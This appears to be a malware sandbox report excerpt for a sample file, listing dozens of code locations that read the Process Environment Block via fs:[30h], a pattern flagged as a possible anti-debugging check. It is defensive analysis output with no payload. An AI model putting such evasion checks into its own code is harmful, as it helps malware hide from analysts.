Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014DA2C3 mov eax, dword ptr fs:[00000030h]	0_2_014DA2C3
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014E02E1 mov eax, dword ptr fs:[00000030h]	0_2_014E02E1
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014E02E1 mov eax, dword ptr fs:[00000030h]	0_2_014E02E1
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014E02E1 mov eax, dword ptr fs:[00000030h]	0_2_014E02E1
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0150E284 mov eax, dword ptr fs:[00000030h]	0_2_0150E284
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0150E284 mov eax, dword ptr fs:[00000030h]	0_2_0150E284
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01550283 mov eax, dword ptr fs:[00000030h]	0_2_01550283
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01550283 mov eax, dword ptr fs:[00000030h]	0_2_01550283
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01550283 mov eax, dword ptr fs:[00000030h]	0_2_01550283
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_015662A0 mov eax, dword ptr fs:[00000030h]	0_2_015662A0
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_015662A0 mov ecx, dword ptr fs:[00000030h]	0_2_015662A0
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_015662A0 mov eax, dword ptr fs:[00000030h]	0_2_015662A0
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_015662A0 mov eax, dword ptr fs:[00000030h]	0_2_015662A0
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_015662A0 mov eax, dword ptr fs:[00000030h]	0_2_015662A0
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_015662A0 mov eax, dword ptr fs:[00000030h]	0_2_015662A0
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014D8550 mov eax, dword ptr fs:[00000030h]	0_2_014D8550
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014D8550 mov eax, dword ptr fs:[00000030h]	0_2_014D8550
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0150656A mov eax, dword ptr fs:[00000030h]	0_2_0150656A
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0150656A mov eax, dword ptr fs:[00000030h]	0_2_0150656A
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0150656A mov eax, dword ptr fs:[00000030h]	0_2_0150656A
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01566500 mov eax, dword ptr fs:[00000030h]	0_2_01566500
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_015A4500 mov eax, dword ptr fs:[00000030h]	0_2_015A4500
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_015A4500 mov eax, dword ptr fs:[00000030h]	0_2_015A4500
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_015A4500 mov eax, dword ptr fs:[00000030h]	0_2_015A4500
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_015A4500 mov eax, dword ptr fs:[00000030h]	0_2_015A4500
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_015A4500 mov eax, dword ptr fs:[00000030h]	0_2_015A4500
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_015A4500 mov eax, dword ptr fs:[00000030h]	0_2_015A4500
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_015A4500 mov eax, dword ptr fs:[00000030h]	0_2_015A4500
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014FE53E mov eax, dword ptr fs:[00000030h]	0_2_014FE53E
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014FE53E mov eax, dword ptr fs:[00000030h]	0_2_014FE53E
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014FE53E mov eax, dword ptr fs:[00000030h]	0_2_014FE53E
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014FE53E mov eax, dword ptr fs:[00000030h]	0_2_014FE53E
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014FE53E mov eax, dword ptr fs:[00000030h]	0_2_014FE53E
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014E0535 mov eax, dword ptr fs:[00000030h]	0_2_014E0535
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014E0535 mov eax, dword ptr fs:[00000030h]	0_2_014E0535
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014E0535 mov eax, dword ptr fs:[00000030h]	0_2_014E0535
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014E0535 mov eax, dword ptr fs:[00000030h]	0_2_014E0535
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014E0535 mov eax, dword ptr fs:[00000030h]	0_2_014E0535
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014E0535 mov eax, dword ptr fs:[00000030h]	0_2_014E0535
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0150A5D0 mov eax, dword ptr fs:[00000030h]	0_2_0150A5D0
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0150A5D0 mov eax, dword ptr fs:[00000030h]	0_2_0150A5D0
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014D65D0 mov eax, dword ptr fs:[00000030h]	0_2_014D65D0
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0150E5CF mov eax, dword ptr fs:[00000030h]	0_2_0150E5CF
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0150E5CF mov eax, dword ptr fs:[00000030h]	0_2_0150E5CF
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014FE5E7 mov eax, dword ptr fs:[00000030h]	0_2_014FE5E7
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014FE5E7 mov eax, dword ptr fs:[00000030h]	0_2_014FE5E7
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014FE5E7 mov eax, dword ptr fs:[00000030h]	0_2_014FE5E7
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014FE5E7 mov eax, dword ptr fs:[00000030h]	0_2_014FE5E7
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014FE5E7 mov eax, dword ptr fs:[00000030h]	0_2_014FE5E7
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014FE5E7 mov eax, dword ptr fs:[00000030h]	0_2_014FE5E7
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014FE5E7 mov eax, dword ptr fs:[00000030h]	0_2_014FE5E7
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014FE5E7 mov eax, dword ptr fs:[00000030h]	0_2_014FE5E7
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014D25E0 mov eax, dword ptr fs:[00000030h]	0_2_014D25E0
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0150C5ED mov eax, dword ptr fs:[00000030h]	0_2_0150C5ED
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0150C5ED mov eax, dword ptr fs:[00000030h]	0_2_0150C5ED
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0150E59C mov eax, dword ptr fs:[00000030h]	0_2_0150E59C
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014D2582 mov eax, dword ptr fs:[00000030h]	0_2_014D2582
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014D2582 mov ecx, dword ptr fs:[00000030h]	0_2_014D2582
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01504588 mov eax, dword ptr fs:[00000030h]	0_2_01504588
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_015505A7 mov eax, dword ptr fs:[00000030h]	0_2_015505A7
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_015505A7 mov eax, dword ptr fs:[00000030h]	0_2_015505A7
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_015505A7 mov eax, dword ptr fs:[00000030h]	0_2_015505A7
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014F45B1 mov eax, dword ptr fs:[00000030h]	0_2_014F45B1
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014F45B1 mov eax, dword ptr fs:[00000030h]	0_2_014F45B1
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0158A456 mov eax, dword ptr fs:[00000030h]	0_2_0158A456
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014C645D mov eax, dword ptr fs:[00000030h]	0_2_014C645D
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0150E443 mov eax, dword ptr fs:[00000030h]	0_2_0150E443
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0150E443 mov eax, dword ptr fs:[00000030h]	0_2_0150E443
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0150E443 mov eax, dword ptr fs:[00000030h]	0_2_0150E443
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0150E443 mov eax, dword ptr fs:[00000030h]	0_2_0150E443
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0150E443 mov eax, dword ptr fs:[00000030h]	0_2_0150E443
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0150E443 mov eax, dword ptr fs:[00000030h]	0_2_0150E443
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0150E443 mov eax, dword ptr fs:[00000030h]	0_2_0150E443
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0150E443 mov eax, dword ptr fs:[00000030h]	0_2_0150E443
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014F245A mov eax, dword ptr fs:[00000030h]	0_2_014F245A
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0155C460 mov ecx, dword ptr fs:[00000030h]	0_2_0155C460
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014FA470 mov eax, dword ptr fs:[00000030h]	0_2_014FA470
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014FA470 mov eax, dword ptr fs:[00000030h]	0_2_014FA470
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014FA470 mov eax, dword ptr fs:[00000030h]	0_2_014FA470
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01508402 mov eax, dword ptr fs:[00000030h]	0_2_01508402
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01508402 mov eax, dword ptr fs:[00000030h]	0_2_01508402
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01508402 mov eax, dword ptr fs:[00000030h]	0_2_01508402
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0150A430 mov eax, dword ptr fs:[00000030h]	0_2_0150A430
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014CC427 mov eax, dword ptr fs:[00000030h]	0_2_014CC427
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014CE420 mov eax, dword ptr fs:[00000030h]	0_2_014CE420
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014CE420 mov eax, dword ptr fs:[00000030h]	0_2_014CE420
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014CE420 mov eax, dword ptr fs:[00000030h]	0_2_014CE420
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01556420 mov eax, dword ptr fs:[00000030h]	0_2_01556420
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01556420 mov eax, dword ptr fs:[00000030h]	0_2_01556420
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01556420 mov eax, dword ptr fs:[00000030h]	0_2_01556420
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01556420 mov eax, dword ptr fs:[00000030h]	0_2_01556420
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01556420 mov eax, dword ptr fs:[00000030h]	0_2_01556420
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01556420 mov eax, dword ptr fs:[00000030h]	0_2_01556420
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01556420 mov eax, dword ptr fs:[00000030h]	0_2_01556420
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014D04E5 mov ecx, dword ptr fs:[00000030h]	0_2_014D04E5
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0158A49A mov eax, dword ptr fs:[00000030h]	0_2_0158A49A
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_015044B0 mov ecx, dword ptr fs:[00000030h]	0_2_015044B0
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0155A4B0 mov eax, dword ptr fs:[00000030h]	0_2_0155A4B0
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014D64AB mov eax, dword ptr fs:[00000030h]	0_2_014D64AB
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01554755 mov eax, dword ptr fs:[00000030h]	0_2_01554755
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01512750 mov eax, dword ptr fs:[00000030h]	0_2_01512750
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01512750 mov eax, dword ptr fs:[00000030h]	0_2_01512750
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0155E75D mov eax, dword ptr fs:[00000030h]	0_2_0155E75D
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014D0750 mov eax, dword ptr fs:[00000030h]	0_2_014D0750
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0150674D mov esi, dword ptr fs:[00000030h]	0_2_0150674D
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0150674D mov eax, dword ptr fs:[00000030h]	0_2_0150674D
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0150674D mov eax, dword ptr fs:[00000030h]	0_2_0150674D
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014D8770 mov eax, dword ptr fs:[00000030h]	0_2_014D8770
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014E0770 mov eax, dword ptr fs:[00000030h]	0_2_014E0770
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014E0770 mov eax, dword ptr fs:[00000030h]	0_2_014E0770
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014E0770 mov eax, dword ptr fs:[00000030h]	0_2_014E0770
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014E0770 mov eax, dword ptr fs:[00000030h]	0_2_014E0770
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014E0770 mov eax, dword ptr fs:[00000030h]	0_2_014E0770
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014E0770 mov eax, dword ptr fs:[00000030h]	0_2_014E0770
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014E0770 mov eax, dword ptr fs:[00000030h]	0_2_014E0770
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014E0770 mov eax, dword ptr fs:[00000030h]	0_2_014E0770
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014E0770 mov eax, dword ptr fs:[00000030h]	0_2_014E0770
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014E0770 mov eax, dword ptr fs:[00000030h]	0_2_014E0770
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014E0770 mov eax, dword ptr fs:[00000030h]	0_2_014E0770
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014E0770 mov eax, dword ptr fs:[00000030h]	0_2_014E0770
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01500710 mov eax, dword ptr fs:[00000030h]	0_2_01500710
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0150C700 mov eax, dword ptr fs:[00000030h]	0_2_0150C700
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014D0710 mov eax, dword ptr fs:[00000030h]	0_2_014D0710
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0154C730 mov eax, dword ptr fs:[00000030h]	0_2_0154C730
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0150273C mov eax, dword ptr fs:[00000030h]	0_2_0150273C
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0150273C mov ecx, dword ptr fs:[00000030h]	0_2_0150273C
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0150273C mov eax, dword ptr fs:[00000030h]	0_2_0150273C
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0150C720 mov eax, dword ptr fs:[00000030h]	0_2_0150C720
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0150C720 mov eax, dword ptr fs:[00000030h]	0_2_0150C720
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014DC7C0 mov eax, dword ptr fs:[00000030h]	0_2_014DC7C0
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_015507C3 mov eax, dword ptr fs:[00000030h]	0_2_015507C3
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014F27ED mov eax, dword ptr fs:[00000030h]	0_2_014F27ED
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014F27ED mov eax, dword ptr fs:[00000030h]	0_2_014F27ED
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014F27ED mov eax, dword ptr fs:[00000030h]	0_2_014F27ED
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0155E7E1 mov eax, dword ptr fs:[00000030h]	0_2_0155E7E1
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014D47FB mov eax, dword ptr fs:[00000030h]	0_2_014D47FB
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014D47FB mov eax, dword ptr fs:[00000030h]	0_2_014D47FB
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0157678E mov eax, dword ptr fs:[00000030h]	0_2_0157678E
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014D07AF mov eax, dword ptr fs:[00000030h]	0_2_014D07AF
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_015847A0 mov eax, dword ptr fs:[00000030h]	0_2_015847A0
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014EC640 mov eax, dword ptr fs:[00000030h]	0_2_014EC640
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01502674 mov eax, dword ptr fs:[00000030h]	0_2_01502674
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0150A660 mov eax, dword ptr fs:[00000030h]	0_2_0150A660
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0150A660 mov eax, dword ptr fs:[00000030h]	0_2_0150A660
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0159866E mov eax, dword ptr fs:[00000030h]	0_2_0159866E
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0159866E mov eax, dword ptr fs:[00000030h]	0_2_0159866E
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014E260B mov eax, dword ptr fs:[00000030h]	0_2_014E260B
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014E260B mov eax, dword ptr fs:[00000030h]	0_2_014E260B
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014E260B mov eax, dword ptr fs:[00000030h]	0_2_014E260B
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014E260B mov eax, dword ptr fs:[00000030h]	0_2_014E260B
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014E260B mov eax, dword ptr fs:[00000030h]	0_2_014E260B
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014E260B mov eax, dword ptr fs:[00000030h]	0_2_014E260B
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014E260B mov eax, dword ptr fs:[00000030h]	0_2_014E260B
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01512619 mov eax, dword ptr fs:[00000030h]	0_2_01512619
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0154E609 mov eax, dword ptr fs:[00000030h]	0_2_0154E609
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014D262C mov eax, dword ptr fs:[00000030h]	0_2_014D262C
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014EE627 mov eax, dword ptr fs:[00000030h]	0_2_014EE627
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01506620 mov eax, dword ptr fs:[00000030h]	0_2_01506620
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01508620 mov eax, dword ptr fs:[00000030h]	0_2_01508620
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0150A6C7 mov ebx, dword ptr fs:[00000030h]	0_2_0150A6C7
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0150A6C7 mov eax, dword ptr fs:[00000030h]	0_2_0150A6C7
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_015506F1 mov eax, dword ptr fs:[00000030h]	0_2_015506F1
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_015506F1 mov eax, dword ptr fs:[00000030h]	0_2_015506F1
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0154E6F2 mov eax, dword ptr fs:[00000030h]	0_2_0154E6F2
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0154E6F2 mov eax, dword ptr fs:[00000030h]	0_2_0154E6F2
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0154E6F2 mov eax, dword ptr fs:[00000030h]	0_2_0154E6F2
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0154E6F2 mov eax, dword ptr fs:[00000030h]	0_2_0154E6F2
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014D4690 mov eax, dword ptr fs:[00000030h]	0_2_014D4690
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014D4690 mov eax, dword ptr fs:[00000030h]	0_2_014D4690
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_015066B0 mov eax, dword ptr fs:[00000030h]	0_2_015066B0
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0150C6A6 mov eax, dword ptr fs:[00000030h]	0_2_0150C6A6
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01550946 mov eax, dword ptr fs:[00000030h]	0_2_01550946
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0155C97C mov eax, dword ptr fs:[00000030h]	0_2_0155C97C
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014F6962 mov eax, dword ptr fs:[00000030h]	0_2_014F6962
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014F6962 mov eax, dword ptr fs:[00000030h]	0_2_014F6962
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014F6962 mov eax, dword ptr fs:[00000030h]	0_2_014F6962
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01574978 mov eax, dword ptr fs:[00000030h]	0_2_01574978
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_01574978 mov eax, dword ptr fs:[00000030h]	0_2_01574978
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0151096E mov eax, dword ptr fs:[00000030h]	0_2_0151096E
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0151096E mov edx, dword ptr fs:[00000030h]	0_2_0151096E
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0151096E mov eax, dword ptr fs:[00000030h]	0_2_0151096E
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0155C912 mov eax, dword ptr fs:[00000030h]	0_2_0155C912
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014C8918 mov eax, dword ptr fs:[00000030h]	0_2_014C8918
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014C8918 mov eax, dword ptr fs:[00000030h]	0_2_014C8918
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0154E908 mov eax, dword ptr fs:[00000030h]	0_2_0154E908
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0154E908 mov eax, dword ptr fs:[00000030h]	0_2_0154E908
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0156892B mov eax, dword ptr fs:[00000030h]	0_2_0156892B
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0155892A mov eax, dword ptr fs:[00000030h]	0_2_0155892A
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_015049D0 mov eax, dword ptr fs:[00000030h]	0_2_015049D0
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0159A9D3 mov eax, dword ptr fs:[00000030h]	0_2_0159A9D3
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_015669C0 mov eax, dword ptr fs:[00000030h]	0_2_015669C0
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014DA9D0 mov eax, dword ptr fs:[00000030h]	0_2_014DA9D0
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014DA9D0 mov eax, dword ptr fs:[00000030h]	0_2_014DA9D0
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014DA9D0 mov eax, dword ptr fs:[00000030h]	0_2_014DA9D0
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014DA9D0 mov eax, dword ptr fs:[00000030h]	0_2_014DA9D0
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014DA9D0 mov eax, dword ptr fs:[00000030h]	0_2_014DA9D0
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014DA9D0 mov eax, dword ptr fs:[00000030h]	0_2_014DA9D0
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_015029F9 mov eax, dword ptr fs:[00000030h]	0_2_015029F9
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_015029F9 mov eax, dword ptr fs:[00000030h]	0_2_015029F9
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_0155E9E0 mov eax, dword ptr fs:[00000030h]	0_2_0155E9E0
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014D09AD mov eax, dword ptr fs:[00000030h]	0_2_014D09AD
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014D09AD mov eax, dword ptr fs:[00000030h]	0_2_014D09AD
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_015589B3 mov esi, dword ptr fs:[00000030h]	0_2_015589B3
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_015589B3 mov eax, dword ptr fs:[00000030h]	0_2_015589B3
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_015589B3 mov eax, dword ptr fs:[00000030h]	0_2_015589B3
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014E29A0 mov eax, dword ptr fs:[00000030h]	0_2_014E29A0
Source: C:\Users\user\Desktop\gH68ux6XtG.exe	Code function: 0_2_014E29A0 mov eax, dword ptr fs:[00000030h]	0_2_014E29A0
